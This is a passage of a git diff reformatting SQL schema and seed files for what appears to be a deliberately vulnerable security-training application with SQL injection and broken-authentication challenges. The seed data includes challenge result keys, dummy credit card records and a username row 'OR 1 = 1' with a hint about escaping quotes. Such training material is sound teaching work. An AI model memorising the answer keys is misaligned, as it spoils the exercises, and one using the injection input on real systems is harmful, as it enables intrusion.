-            `tempPassword`   TINYINT(1)   NULL     DEFAULT FALSE,
-            `userScore`      INT          NOT NULL DEFAULT 0,
-            PRIMARY KEY (`userId`),
-            INDEX `classId` (`classId` ASC),
-            UNIQUE INDEX `userName_UNIQUE` (`userName` ASC),
-            CONSTRAINT `classId`
-                FOREIGN KEY (`classId`)
-                    REFERENCES `backup`.`class` (`classId`)
-                    ON DELETE CASCADE
-                    ON UPDATE CASCADE
-        )
-            ENGINE = InnoDB;
-
-        -- -----------------------------------------------------
+CREATE  TABLE IF NOT EXISTS `backup`.`users` (
+  `userId` VARCHAR(64) NOT NULL ,
+  `classId` VARCHAR(64) NULL ,
+  `userName` VARCHAR(32) NOT NULL ,
+  `userPass` VARCHAR(191) NOT NULL ,
+  `userRole` VARCHAR(32) NOT NULL ,
+  `badLoginCount` INT NOT NULL DEFAULT 0 ,
+  `suspendedUntil` DATETIME NOT NULL DEFAULT '1000-01-01 00:00:00' ,
+  `userAddress` VARCHAR(128) NULL ,
+  `tempPassword` TINYINT(1)  NULL DEFAULT FALSE ,
+  `userScore` INT NOT NULL DEFAULT 0 ,
+  PRIMARY KEY (`userId`) ,
+  INDEX `classId` (`classId` ASC) ,
+  UNIQUE INDEX `userName_UNIQUE` (`userName` ASC) ,
+  CONSTRAINT `classId`
+    FOREIGN KEY (`classId` )
+    REFERENCES `backup`.`class` (`classId` )
+    ON DELETE CASCADE
+    ON UPDATE CASCADE)
+ENGINE = InnoDB;
+
+-- -----------------------------------------------------
 -- Table `core`.`modules`
 -- -----------------------------------------------------
-        CREATE TABLE IF NOT EXISTS `backup`.`modules`
-        (
-            `moduleId`        VARCHAR(64)  NOT NULL,
-            `moduleName`      VARCHAR(64)  NOT NULL,
-            `moduleType`      VARCHAR(16)  NOT NULL,
-            `moduleCategory`  VARCHAR(64)  NULL,
-            `moduleResult`    VARCHAR(191) NULL,
-            `moduleHash`      VARCHAR(191) NULL,
-            `incrementalRank` INT          NULL,
-            `scoreValue`      INT          NOT NULL DEFAULT 50,
-            `scoreBonus`      INT          NOT NULL DEFAULT 5,
-            PRIMARY KEY (`moduleId`)
-        )
-            ENGINE = InnoDB;
-
-
-        -- -----------------------------------------------------
+CREATE  TABLE IF NOT EXISTS `backup`.`modules` (
+  `moduleId` VARCHAR(64) NOT NULL ,
+  `moduleName` VARCHAR(64) NOT NULL ,
+  `moduleType` VARCHAR(16) NOT NULL ,
+  `moduleCategory` VARCHAR(64) NULL ,
+  `moduleResult` VARCHAR(191) NULL ,
+  `moduleHash` VARCHAR(191) NULL ,
+  `incrementalRank` INT NULL ,
+  `scoreValue` INT NOT NULL DEFAULT 50 ,
+  `scoreBonus` INT NOT NULL DEFAULT 5 ,
+  PRIMARY KEY (`moduleId`) )
+ENGINE = InnoDB;
+
+
+-- -----------------------------------------------------
 -- Table `core`.`results`
 -- -----------------------------------------------------
-        CREATE TABLE IF NOT EXISTS `backup`.`results`
-        (
-            `userId`           VARCHAR(64) NOT NULL,
-            `moduleId`         VARCHAR(64) NOT NULL,
-            `startTime`        DATETIME    NOT NULL,
-            `finishTime`       DATETIME    NULL,
-            `csrfCount`        INT         NULL DEFAULT 0,
-            `resultSubmission` LONGTEXT    NULL,
-            `knowledgeBefore`  INT         NULL,
-            `knowledgeAfter`   INT         NULL,
-            `difficulty`       INT         NULL,
-            PRIMARY KEY (`userId`, `moduleId`),
-            INDEX `fk_Results_Modules1` (`moduleId` ASC),
-            CONSTRAINT `fk_Results_users1`
-                FOREIGN KEY (`userId`)
-                    REFERENCES `backup`.`users` (`userId`)
-                    ON DELETE NO ACTION
-                    ON UPDATE NO ACTION,
-            CONSTRAINT `fk_Results_Modules1`
-                FOREIGN KEY (`moduleId`)
-                    REFERENCES `backup`.`modules` (`moduleId`)
-                    ON DELETE CASCADE
-                    ON UPDATE CASCADE
-        )
-            ENGINE = InnoDB;
-
-
-        -- -----------------------------------------------------
+CREATE  TABLE IF NOT EXISTS `backup`.`results` (
+  `userId` VARCHAR(64) NOT NULL ,
+  `moduleId` VARCHAR(64) NOT NULL ,
+  `startTime` DATETIME NOT NULL ,
+  `finishTime` DATETIME NULL ,
+  `csrfCount` INT NULL DEFAULT 0 ,
+  `resultSubmission` LONGTEXT NULL ,
+  `knowledgeBefore` INT NULL ,
+  `knowledgeAfter` INT NULL ,
+  `difficulty` INT NULL ,
+  PRIMARY KEY (`userId`, `moduleId`) ,
+  INDEX `fk_Results_Modules1` (`moduleId` ASC) ,
+  CONSTRAINT `fk_Results_users1`
+    FOREIGN KEY (`userId` )
+    REFERENCES `backup`.`users` (`userId` )
+    ON DELETE NO ACTION
+    ON UPDATE NO ACTION,
+  CONSTRAINT `fk_Results_Modules1`
+    FOREIGN KEY (`moduleId` )
+    REFERENCES `backup`.`modules` (`moduleId` )
+    ON DELETE CASCADE
+    ON UPDATE CASCADE)
+ENGINE = InnoDB;
+
+
+-- -----------------------------------------------------
 -- Table `core`.`cheatsheet`
 -- -----------------------------------------------------
-        CREATE TABLE IF NOT EXISTS `backup`.`cheatsheet`
-        (
-            `cheatSheetId` VARCHAR(64) NOT NULL,
-            `moduleId`     VARCHAR(64) NOT NULL,
-            `createDate`   DATETIME    NOT NULL,
-            `solution`     LONGTEXT    NOT NULL,
-            PRIMARY KEY (`cheatSheetId`, `moduleId`),
-            INDEX `fk_CheatSheet_Modules1` (`moduleId` ASC),
-            CONSTRAINT `fk_CheatSheet_Modules1`
-                FOREIGN KEY (`moduleId`)
-                    REFERENCES `backup`.`modules` (`moduleId`)
-                    ON DELETE CASCADE
-                    ON UPDATE CASCADE
-        )
-            ENGINE = InnoDB;
-
-
-        -- -----------------------------------------------------
+CREATE  TABLE IF NOT EXISTS `backup`.`cheatsheet` (
+  `cheatSheetId` VARCHAR(64) NOT NULL ,
+  `moduleId` VARCHAR(64) NOT NULL ,
+  `createDate` DATETIME NOT NULL ,
+  `solution` LONGTEXT NOT NULL ,
+  PRIMARY KEY (`cheatSheetId`, `moduleId`) ,
+  INDEX `fk_CheatSheet_Modules1` (`moduleId` ASC) ,
+  CONSTRAINT `fk_CheatSheet_Modules1`
+    FOREIGN KEY (`moduleId` )
+    REFERENCES `backup`.`modules` (`moduleId` )
+    ON DELETE CASCADE
+    ON UPDATE CASCADE)
+ENGINE = InnoDB;
+
+
+-- -----------------------------------------------------
 -- Table `core`.`sequence`
 -- -----------------------------------------------------
-        CREATE TABLE IF NOT EXISTS `backup`.`sequence`
-        (
-            `tableName` VARCHAR(32) NOT NULL,
-            `currVal`   BIGINT(20)  NOT NULL DEFAULT 282475249,
-            PRIMARY KEY (`tableName`)
-        )
-            ENGINE = InnoDB;
+CREATE  TABLE IF NOT EXISTS `backup`.`sequence` (
+  `tableName` VARCHAR(32) NOT NULL ,
+  `currVal` BIGINT(20) NOT NULL DEFAULT 282475249 ,
+  PRIMARY KEY (`tableName`) )
+ENGINE = InnoDB;
 
 
-        Insert into `backup`.`class` (Select * from `core`.`class`);
-        Insert into `backup`.`users` (Select * from `core`.`users`);
-        Insert into `backup`.`modules` (Select * from `core`.`modules`);
-        Insert into `backup`.`results` (Select * from `core`.`results`);
-        Insert into `backup`.`cheatsheet` (Select * from `core`.`cheatsheet`);
-        Insert into `backup`.`sequence` (Select * from `core`.`sequence`);
 
-    END
+Insert into `backup`.`class` (Select * from `core`.`class`);
+Insert into `backup`.`users` (Select * from `core`.`users`);
+Insert into `backup`.`modules` (Select * from `core`.`modules`);
+Insert into `backup`.`results` (Select * from `core`.`results`);
+Insert into `backup`.`cheatsheet` (Select * from `core`.`cheatsheet`);
+Insert into `backup`.`sequence` (Select * from `core`.`sequence`);
 
--- $$
+END
+
+ -- $$
 -- DELIMITER ;
 ;
diff --git a/src/main/resources/database/moduleSchemas.sql b/src/main/resources/database/moduleSchemas.sql
index e729761d6..48f187a79 100644
--- a/src/main/resources/database/moduleSchemas.sql
+++ b/src/main/resources/database/moduleSchemas.sql
@@ -24,67 +24,39 @@
 -- SQL Lesson
 -- ======================================================
 
-SET
-@OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0;
-SET
-@OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0;
-SET
-@OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='TRADITIONAL';
+SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0;
+SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0;
+SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='TRADITIONAL';
 
 DROP SCHEMA IF EXISTS `SqlInjLesson`;
-CREATE SCHEMA IF NOT EXISTS `SqlInjLesson` DEFAULT CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci;
-USE
-`SqlInjLesson` ;
+CREATE SCHEMA IF NOT EXISTS `SqlInjLesson` DEFAULT CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci ;
+USE `SqlInjLesson` ;
 
 -- -----------------------------------------------------
 -- Table `SqlInjLesson`.`tb_users`
 -- -----------------------------------------------------
-CREATE TABLE IF NOT EXISTS `SqlInjLesson`.`tb_users`
-(
-    `usersId`
-    INT
-    NOT
-    NULL
-    AUTO_INCREMENT,
-    `username`
-    VARCHAR
-(
-    64
-) NOT NULL ,
-    `comment` LONGTEXT NULL ,
-    PRIMARY KEY
-(
-    `usersId`
-) )
-    ENGINE = InnoDB;
-
-SET
-SQL_MODE=@OLD_SQL_MODE;
-SET
-FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS;
-SET
-UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS;
+CREATE TABLE IF NOT EXISTS `SqlInjLesson`.`tb_users` (
+  `usersId` INT NOT NULL AUTO_INCREMENT ,
+  `username` VARCHAR(64) NOT NULL ,
+  `comment` LONGTEXT NULL ,
+  PRIMARY KEY (`usersId`) )
+ENGINE = InnoDB;
+
+SET SQL_MODE=@OLD_SQL_MODE;
+SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS;
+SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS;
 
 -- -----------------------------------------------------
 -- Data for table `SqlInjLesson`.`tb_users`
 -- -----------------------------------------------------
 START TRANSACTION;
-USE
-`SqlInjLesson`;
-INSERT INTO `SqlInjLesson`.`tb_users` (`usersId`, `username`, `comment`)
-VALUES (14232, 'Mark Denihan', 'This guy wrote this application');
-INSERT INTO `SqlInjLesson`.`tb_users` (`usersId`, `username`, `comment`)
-VALUES (61523, 'Cloud', 'Has a Big Sword');
-INSERT INTO `SqlInjLesson`.`tb_users` (`usersId`, `username`, `comment`)
-VALUES (12543, 'Fred Mtenzi', 'A lecturer in DIT Kevin Street');
-INSERT INTO `SqlInjLesson`.`tb_users` (`usersId`, `username`, `comment`)
-VALUES (82642, 'qw!dshs@ab',
-        'Lesson Completed. The result key is 3c17f6bf34080979e0cebda5672e989c07ceec9fa4ee7b7c17c9e3ce26bc63e0');
-INSERT INTO `SqlInjLesson`.`tb_users` (`usersId`, `username`, `comment`)
-VALUES (12345, 'user', 'Try Adding some SQL Code');
-INSERT INTO `SqlInjLesson`.`tb_users` (`usersId`, `username`, `comment`)
-VALUES (12346, 'OR 1 = 1',
-        'Your Close, You need to escape the string with an apostraphe so that your code is interpreted');
+USE `SqlInjLesson`;
+INSERT INTO `SqlInjLesson`.`tb_users` (`usersId`, `username`, `comment`) VALUES (14232, 'Mark Denihan', 'This guy wrote this application');
+INSERT INTO `SqlInjLesson`.`tb_users` (`usersId`, `username`, `comment`) VALUES (61523, 'Cloud', 'Has a Big Sword');
+INSERT INTO `SqlInjLesson`.`tb_users` (`usersId`, `username`, `comment`) VALUES (12543, 'Fred Mtenzi', 'A lecturer in DIT Kevin Street');
+INSERT INTO `SqlInjLesson`.`tb_users` (`usersId`, `username`, `comment`) VALUES (82642, 'qw!dshs@ab', 'Lesson Completed. The result key is 3c17f6bf34080979e0cebda5672e989c07ceec9fa4ee7b7c17c9e3ce26bc63e0');
+INSERT INTO `SqlInjLesson`.`tb_users` (`usersId`, `username`, `comment`) VALUES (12345, 'user', 'Try Adding some SQL Code');
+INSERT INTO `SqlInjLesson`.`tb_users` (`usersId`, `username`, `comment`) VALUES (12346, 'OR 1 = 1', 'Your Close, You need to escape the string with an apostraphe so that your code is interpreted');
 
 COMMIT;
 
@@ -92,64 +64,38 @@ COMMIT;
 -- SQL Challenge Two (email)
 -- ======================================================
 
-SET
-@OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0;
-SET
-@OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0;
-SET
-@OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='TRADITIONAL';
+SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0;
+SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0;
+SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='TRADITIONAL';
 
-DROP SCHEMA IF EXISTS `SqlChalEmail`;
-CREATE SCHEMA IF NOT EXISTS `SqlChalEmail` DEFAULT CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci;
-USE
-`SqlChalEmail` ;
+DROP SCHEMA IF EXISTS `SqlChalEmail` ;
+CREATE SCHEMA IF NOT EXISTS `SqlChalEmail` DEFAULT CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci ;
+USE `SqlChalEmail` ;
 
 -- -----------------------------------------------------
 -- Table `SqlChalEmail`.`customers`
 -- -----------------------------------------------------
-CREATE TABLE IF NOT EXISTS `SqlChalEmail`.`customers`
-(
-    `customerId` VARCHAR
-(
-    64
-) NOT NULL ,
-    `customerName` VARCHAR
-(
-    32
-) NOT NULL ,
-    `customerAddress` VARCHAR
-(
-    32
-) NOT NULL ,
-    `comment` LONGTEXT NULL ,
-    PRIMARY KEY
-(
-    `customerId`
-) )
-    ENGINE = InnoDB;
-
-SET
-SQL_MODE=@OLD_SQL_MODE;
-SET
-FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS;
-SET
-UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS;
+CREATE  TABLE IF NOT EXISTS `SqlChalEmail`.`customers` (
+  `customerId` VARCHAR(64) NOT NULL ,
+  `customerName` VARCHAR(32) NOT NULL ,
+  `customerAddress` VARCHAR(32) NOT NULL ,
+  `comment` LONGTEXT NULL ,
+  PRIMARY KEY (`customerId`) )
+ENGINE = InnoDB;
+
+SET SQL_MODE=@OLD_SQL_MODE;
+SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS;
+SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS;
 
 -- -----------------------------------------------------
 -- Data for table `SqlChalEmail`.`customers`
 -- -----------------------------------------------------
 START TRANSACTION;
-USE
-`SqlChalEmail`;
-INSERT INTO `SqlChalEmail`.`customers` (`customerId`, `customerName`, `customerAddress`, `comment`)
-VALUES ('019ce129ee8960a6b875b20095705d53f8c7b0ca', 'John Fits', 'crazycat@example.com', NULL);
-INSERT INTO `SqlChalEmail`.`customers` (`customerId`, `customerName`, `customerAddress`, `comment`)
-VALUES ('44e2bdc1059903f464e5ba9a34b927614d7fee55', 'Rita Hanolan', 'thenightbefore@example.com',
-        'Well Done! The Result key is f62abebf5658a6a44c5c9babc7865110c62f5ecd9d0a7052db48c4dbee0200e3');
-INSERT INTO `SqlChalEmail`.`customers` (`customerId`, `customerName`, `customerAddress`, `comment`)
-VALUES ('05159435826869ccfd76d77a2ed4ba7c2023f0cb', 'Rubix Man', 'manycolours@cube.com', NULL);
-INSERT INTO `SqlChalEmail`.`customers` (`customerId`, `customerName`, `customerAddress`, `comment`)
-VALUES ('6c5c26a1deccf4a87059deb0a3fb463ff7d62fd5', 'Paul O Brien', 'sixshooter@deaf.com', NULL);
+USE `SqlChalEmail`;
+INSERT INTO `SqlChalEmail`.`customers` (`customerId`, `customerName`, `customerAddress`, `comment`) VALUES ('019ce129ee8960a6b875b20095705d53f8c7b0ca', 'John Fits', 'crazycat@example.com', NULL);
+INSERT INTO `SqlChalEmail`.`customers` (`customerId`, `customerName`, `customerAddress`, `comment`) VALUES ('44e2bdc1059903f464e5ba9a34b927614d7fee55', 'Rita Hanolan', 'thenightbefore@example.com', 'Well Done! The Result key is f62abebf5658a6a44c5c9babc7865110c62f5ecd9d0a7052db48c4dbee0200e3');
+INSERT INTO `SqlChalEmail`.`customers` (`customerId`, `customerName`, `customerAddress`, `comment`) VALUES ('05159435826869ccfd76d77a2ed4ba7c2023f0cb', 'Rubix Man', 'manycolours@cube.com', NULL);
+INSERT INTO `SqlChalEmail`.`customers` (`customerId`, `customerName`, `customerAddress`, `comment`) VALUES ('6c5c26a1deccf4a87059deb0a3fb463ff7d62fd5', 'Paul O Brien', 'sixshooter@deaf.com', NULL);
 
 COMMIT;
 
@@ -157,65 +103,39 @@ COMMIT;
 -- SQL Challenge 1
 -- ======================================================
 
-SET
-@OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0;
-SET
-@OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0;
-SET
-@OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='TRADITIONAL';
+SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0;
+SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0;
+SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='TRADITIONAL';
 
-CREATE SCHEMA IF NOT EXISTS `SqlChalOne` DEFAULT CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci;
-USE
-`SqlChalOne` ;
+CREATE SCHEMA IF NOT EXISTS `SqlChalOne` DEFAULT CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci ;
+USE `SqlChalOne` ;
 
 -- -----------------------------------------------------
 -- Table `SqlChalOne`.`customers`
 -- -----------------------------------------------------
-DROP TABLE IF EXISTS `SqlChalOne`.`customers`;
-
-CREATE TABLE IF NOT EXISTS `SqlChalOne`.`customers`
-(
-    `customerId` VARCHAR
-(
-    64
-) NOT NULL ,
-    `customerName` VARCHAR
-(
-    32
-) NOT NULL ,
-    `customerAddress` VARCHAR
-(
-    32
-) NOT NULL ,
-    `comment` LONGTEXT NULL ,
-    PRIMARY KEY
-(
-    `customerId`
-) )
-    ENGINE = InnoDB;
-
-SET
-SQL_MODE=@OLD_SQL_MODE;
-SET
-FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS;
-SET
-UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS;
+DROP TABLE IF EXISTS `SqlChalOne`.`customers` ;
+
+CREATE  TABLE IF NOT EXISTS `SqlChalOne`.`customers` (
+  `customerId` VARCHAR(64) NOT NULL ,
+  `customerName` VARCHAR(32) NOT NULL ,
+  `customerAddress` VARCHAR(32) NOT NULL ,
+  `comment` LONGTEXT NULL ,
+  PRIMARY KEY (`customerId`) )
+ENGINE = InnoDB;
+
+SET SQL_MODE=@OLD_SQL_MODE;
+SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS;
+SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS;
 
 -- -----------------------------------------------------
 -- Data for table `SqlChalOne`.`customers`
 -- -----------------------------------------------------
 START TRANSACTION;
-USE
-`SqlChalOne`;
-INSERT INTO `SqlChalOne`.`customers` (`customerId`, `customerName`, `customerAddress`, `comment`)
-VALUES ('019ce129ee8960a6b875b20095705d53f8c7b0ca', 'John Fits', 'crazycat@example.com', NULL);
-INSERT INTO `SqlChalOne`.`customers` (`customerId`, `customerName`, `customerAddress`, `comment`)
-VALUES ('44e2bdc1059903f464e5ba9a34b927614d7fee55', 'Rita Hanolan', 'thenightbefore@example.com', NULL);
-INSERT INTO `SqlChalOne`.`customers` (`customerId`, `customerName`, `customerAddress`, `comment`)
-VALUES ('05159435826869ccfd76d77a2ed4ba7c2023f0cb', 'Rubix Man', 'manycolours@cube.com', NULL);
-INSERT INTO `SqlChalOne`.`customers` (`customerId`, `customerName`, `customerAddress`, `comment`)
-VALUES ('6c5c26a1deccf4a87059deb0a3fb463ff7d62fd5', 'Paul O Brien', 'sixshooter@deaf.com',
-        'Well Done! The reuslt Key is fd8e9a29dab791197115b58061b215594211e72c1680f1eacc50b0394133a09f');
+USE `SqlChalOne`;
+INSERT INTO `SqlChalOne`.`customers` (`customerId`, `customerName`, `customerAddress`, `comment`) VALUES ('019ce129ee8960a6b875b20095705d53f8c7b0ca', 'John Fits', 'crazycat@example.com', NULL);
+INSERT INTO `SqlChalOne`.`customers` (`customerId`, `customerName`, `customerAddress`, `comment`) VALUES ('44e2bdc1059903f464e5ba9a34b927614d7fee55', 'Rita Hanolan', 'thenightbefore@example.com', NULL);
+INSERT INTO `SqlChalOne`.`customers` (`customerId`, `customerName`, `customerAddress`, `comment`) VALUES ('05159435826869ccfd76d77a2ed4ba7c2023f0cb', 'Rubix Man', 'manycolours@cube.com', NULL);
+INSERT INTO `SqlChalOne`.`customers` (`customerId`, `customerName`, `customerAddress`, `comment`) VALUES ('6c5c26a1deccf4a87059deb0a3fb463ff7d62fd5', 'Paul O Brien', 'sixshooter@deaf.com', 'Well Done! The reuslt Key is fd8e9a29dab791197115b58061b215594211e72c1680f1eacc50b0394133a09f');
 
 COMMIT;
 
@@ -223,271 +143,148 @@ COMMIT;
 -- SQL Challenge 3
 -- ======================================================
 
-SET
-@OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0;
-SET
-@OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0;
-SET
-@OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='TRADITIONAL';
+SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0;
+SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0;
+SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='TRADITIONAL';
 
-CREATE SCHEMA IF NOT EXISTS `SqlChalThree` DEFAULT CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci;
-USE
-`SqlChalThree` ;
+CREATE SCHEMA IF NOT EXISTS `SqlChalThree` DEFAULT CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci ;
+USE `SqlChalThree` ;
 
 -- -----------------------------------------------------
 -- Table `SqlChalThree`.`customers`
 -- -----------------------------------------------------
-DROP TABLE IF EXISTS `SqlChalThree`.`customers`;
-
-CREATE TABLE IF NOT EXISTS `SqlChalThree`.`customers`
-(
-    `customerId` VARCHAR
-(
-    64
-) NOT NULL ,
-    `customerName` VARCHAR
-(
-    32
-) NOT NULL ,
-    `creditCardNumber` VARCHAR
-(
-    19
-) NOT NULL ,
-    `creditCardExp` VARCHAR
-(
-    5
-) NOT NULL ,
-    `creditCardSecurityNumber` VARCHAR
-(
-    3
-) NOT NULL ,
-    PRIMARY KEY
-(
-    `customerId`
-) )
-    ENGINE = InnoDB;
-
-SET
-SQL_MODE=@OLD_SQL_MODE;
-SET
-FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS;
-SET
-UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS;
+DROP TABLE IF EXISTS `SqlChalThree`.`customers` ;
+
+CREATE  TABLE IF NOT EXISTS `SqlChalThree`.`customers` (
+  `customerId` VARCHAR(64) NOT NULL ,
+  `customerName` VARCHAR(32) NOT NULL ,
+  `creditCardNumber` VARCHAR(19) NOT NULL ,
+  `creditCardExp` VARCHAR(5) NOT NULL ,
+  `creditCardSecurityNumber` VARCHAR(3) NOT NULL ,
+  PRIMARY KEY (`customerId`) )
+ENGINE = InnoDB;
+
+SET SQL_MODE=@OLD_SQL_MODE;
+SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS;
+SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS;
 
 -- -----------------------------------------------------
 -- Data for table `SqlChalThree`.`customers`
 -- -----------------------------------------------------
 START TRANSACTION;
-USE
-`SqlChalThree`;
-INSERT INTO `SqlChalThree`.`customers` (`customerId`, `customerName`, `creditCardNumber`, `creditCardExp`,
-                                        `creditCardSecurityNumber`)
-VALUES ('ef322ce991de1a890470ad94001e2b83b9266334', 'John Doe', '8454 1244 4712 2144', '12/13', '452');
-INSERT INTO `SqlChalThree`.`customers` (`customerId`, `customerName`, `creditCardNumber`, `creditCardExp`,
-                                        `creditCardSecurityNumber`)
-VALUES ('92cb640f60e2c9ea11cf89ef2c87d442dc3fa345', 'Jason McCoy', '5468 1763 1854 1451', '12/13', '285');
-INSERT INTO `SqlChalThree`.`customers` (`customerId`, `customerName`, `creditCardNumber`, `creditCardExp`,
-                                        `creditCardSecurityNumber`)
-VALUES ('8d6588bbfe4ac5b52ebf452dfc5cefe934b788ae', 'Mark Denihan', '1245 2514 2315 2147', '09/20', '745');
-INSERT INTO `SqlChalThree`.`customers` (`customerId`, `customerName`, `creditCardNumber`, `creditCardExp`,
-                                        `creditCardSecurityNumber`)
-VALUES ('b8811379df47b10b59b717942b8d2aaafeb8f0f8', 'Mary Martin', '9815 1547 3214 7569', '11/14', '987');
-INSERT INTO `SqlChalThree`.`customers` (`customerId`, `customerName`, `creditCardNumber`, `creditCardExp`,
-                                        `creditCardSecurityNumber`)
-VALUES ('cef8433dc9f4e532999fd7767eaaf7ab620fd94d', 'Joseph McDonnell', '9175 1244 4758 8854', '12/13', '653');
+USE `SqlChalThree`;
+INSERT INTO `SqlChalThree`.`customers` (`customerId`, `customerName`, `creditCardNumber`, `creditCardExp`, `creditCardSecurityNumber`) VALUES ('ef322ce991de1a890470ad94001e2b83b9266334', 'John Doe', '8454 1244 4712 2144', '12/13', '452');
+INSERT INTO `SqlChalThree`.`customers` (`customerId`, `customerName`, `creditCardNumber`, `creditCardExp`, `creditCardSecurityNumber`) VALUES ('92cb640f60e2c9ea11cf89ef2c87d442dc3fa345', 'Jason McCoy', '5468 1763 1854 1451', '12/13', '285');
+INSERT INTO `SqlChalThree`.`customers` (`customerId`, `customerName`, `creditCardNumber`, `creditCardExp`, `creditCardSecurityNumber`) VALUES ('8d6588bbfe4ac5b52ebf452dfc5cefe934b788ae', 'Mark Denihan', '1245 2514 2315 2147', '09/20', '745');
+INSERT INTO `SqlChalThree`.`customers` (`customerId`, `customerName`, `creditCardNumber`, `creditCardExp`, `creditCardSecurityNumber`) VALUES ('b8811379df47b10b59b717942b8d2aaafeb8f0f8', 'Mary Martin', '9815 1547 3214 7569', '11/14', '987');
+INSERT INTO `SqlChalThree`.`customers` (`customerId`, `customerName`, `creditCardNumber`, `creditCardExp`, `creditCardSecurityNumber`) VALUES ('cef8433dc9f4e532999fd7767eaaf7ab620fd94d', 'Joseph McDonnell', '9175 1244 4758 8854', '12/13', '653');
 
 COMMIT;
 
 -- ======================================================
 -- Broken Authentication and Session Management Challenge 2
 -- ======================================================
-SET
-@OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0;
-SET
-@OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0;
-SET
-@OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='TRADITIONAL';
+SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0;
+SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0;
+SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='TRADITIONAL';
 
-DROP SCHEMA IF EXISTS `BrokenAuthAndSessMangChalTwo`;
-CREATE SCHEMA IF NOT EXISTS `BrokenAuthAndSessMangChalTwo` DEFAULT CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci;
-USE
-`BrokenAuthAndSessMangChalTwo` ;
+DROP SCHEMA IF EXISTS `BrokenAuthAndSessMangChalTwo` ;
+CREATE SCHEMA IF NOT EXISTS `BrokenAuthAndSessMangChalTwo` DEFAULT CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci ;
+USE `BrokenAuthAndSessMangChalTwo` ;
 
 -- -----------------------------------------------------
 -- Table `BrokenAuthAndSessMangChalTwo`.`users`
 -- -----------------------------------------------------
-CREATE TABLE IF NOT EXISTS `BrokenAuthAndSessMangChalTwo`.`users`
-(
-    `userId`
-    INT
-    NOT
-    NULL,
-    `userName`
-    VARCHAR
-(
-    32
-) NOT NULL ,
-    `userPassword` VARCHAR
-(
-    128
-) NOT NULL ,
-    `userAddress` VARCHAR
-(
-    128
-) NOT NULL ,
-    PRIMARY KEY
-(
-    `userId`
-) )
-    ENGINE = InnoDB;
-
-
-
-SET
-SQL_MODE=@OLD_SQL_MODE;
-SET
-FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS;
-SET
-UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS;
+CREATE  TABLE IF NOT EXISTS `BrokenAuthAndSessMangChalTwo`.`users` (
+  `userId` INT NOT NULL ,
+  `userName` VARCHAR(32) NOT NULL ,
+  `userPassword` VARCHAR(128) NOT NULL ,
+  `userAddress` VARCHAR(128) NOT NULL ,
